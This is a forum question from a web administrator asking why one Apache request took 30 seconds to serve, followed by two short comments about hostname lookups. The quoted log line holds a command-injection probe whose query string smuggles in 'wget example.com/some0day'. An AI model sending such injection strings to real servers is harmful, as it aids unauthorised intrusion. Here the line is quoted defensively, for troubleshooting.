# What can cause Apache to spend 30s to serve a request that normally takes less than 1s?

Tags: apache-2.4

I am reviewing my Apache access log and came across this line:

```
%T Method Request                                                        Protocol  Status %I  %b    %O   User-Agent   
30 GET    /?x0a/x04/x0a/x02/x06/x08/x09/dns;wget%20example.com/some0day; HTTP/1.0  200    176 11593 8000 SomeBot
```

The request doesn't occur at a time when the server is busy. Also, such slowness did not show up on my database slow query log. This is just a one-off event.

Since it is a GET query, I wonder why would it cause such a server lag. The output size `%b` indicates that my web application has processed it normally and there are no errors in the application log to indicate otherwise. However the output seems to be truncated when it is sent back to the client as `%O` is less than `%b`.

I understand that this could be an attack. But I want to know what could be causing Apache to take such a long time to process the request.

Comment: How is [`HostNameLookups`](http://httpd.apache.org/docs/current/mod/core.html#hostnamelookups) set?

Comment: @HåkanLindqvist, that is not set.